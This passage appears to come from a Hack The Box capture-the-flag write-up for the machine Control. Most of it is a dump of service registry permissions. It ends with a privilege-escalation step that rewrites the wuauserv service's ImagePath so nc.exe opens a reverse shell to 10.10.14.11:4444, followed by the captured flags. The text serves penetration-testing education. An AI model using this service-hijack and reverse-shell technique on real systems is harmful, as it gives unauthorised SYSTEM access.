CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
BUILTIN\Users Allow –1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
BUILTIN\Users Allow –1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863–2974–47D1–89E0–E507677AA14F}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863–2974–47D1–89E0–E507677AA14F}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D–04EB–44C6–B602–FF2798EB7BB3}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D–04EB–44C6–B602–FF2798EB7BB3}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026–8E3E–4F7D–88FD–E7FB0E93CF39}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026–8E3E–4F7D–88FD–E7FB0E93CF39}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
|
ABUSING SERVICES
I have a list of services Hector can run with full control. The service “wuauserv” is what I should use as per the hint I received in HTB Forum.
Windows WUAUServ is a system service of the Windows Update feature. It runs only when Windows Update is running. This service runs for a couple of minutes and verifies if there is a Windows Update is going on or no if the service is not running it stops itself.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
*Evil–WinRM* PS C:\Users\Hector\Documents> Get–ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
Get–ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
DependOnService : {rpcss}
Description : @%systemroot%\system32\wuaueng.dll,–106
DisplayName : @%systemroot%\system32\wuaueng.dll,–105
ErrorControl : 1
FailureActions : {128, 81, 1, 0…}
ImagePath : C:\Windows\system32\svchost.exe –k netsvcs –p
ObjectName : LocalSystem
RequiredPrivileges : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType : 1
Start : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB : 167
SvcMemSoftLimitInMB : 88
Type : 32
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : wuauserv
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
|
If you remember the retired machine Helpline, I exploit the windows print spool service to run my nc.exe. I’m going to use the same practice to exploit this machine.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> copy nc.exe C:\windows\system32\spool\drivers\color\nc.exe
1
2
3
4
5
|
*Evil–WinRM* PS C:\Users\Hector\Documents> reg add “HKLM\System\CurrentControlSet\services\wuauserv” /t REG_EXPAND_SZ /v ImagePath /d “C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd” /f
reg add “HKLM\System\CurrentControlSet\services\wuauserv” /t REG_EXPAND_SZ /v ImagePath /d “C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd” /f
The operation completed successfully.
*Evil–WinRM* PS C:\Users\Hector\Documents>
|
START LISTENING:
root@kali:~/htb# rlwrap nc -nlvp 4444 listening on [any] 4444 ...
START SERVICE
1
2
3
|
*Evil–WinRM* PS C:\Users\Hector\Documents>
*Evil–WinRM* PS C:\Users\Hector\Documents> Start–Service wuauserv
Start–Service wuauserv
|
*Evil-WinRM* PS C:\Users\Hector\Documents> get-service wuauserv Status Name DisplayName ------ ---- ----------- Stopped wuauserv Windows Update *Evil-WinRM* PS C:\Users\Hector\Documents> start-service wuauserv
REVERSE SHELL AS ADMINISTRATOR
*Evil-WinRM* PS C:\Users\Hector\Documents> sc.exe query wuauserv SERVICE_NAME: wuauserv TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\Hector\Documents> get-process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- *Evil-WinRM* PS C:\Users\Hector\Documents> taskkill.exe /f /pid 728 SUCCESS: The process with PID 728 has been terminated.
user=>d8782dd01fb15b72c4b5ba77ef2d472b root=>8f8613f5b4da391f36ef11def4cec1b1
Author : Puckiestyle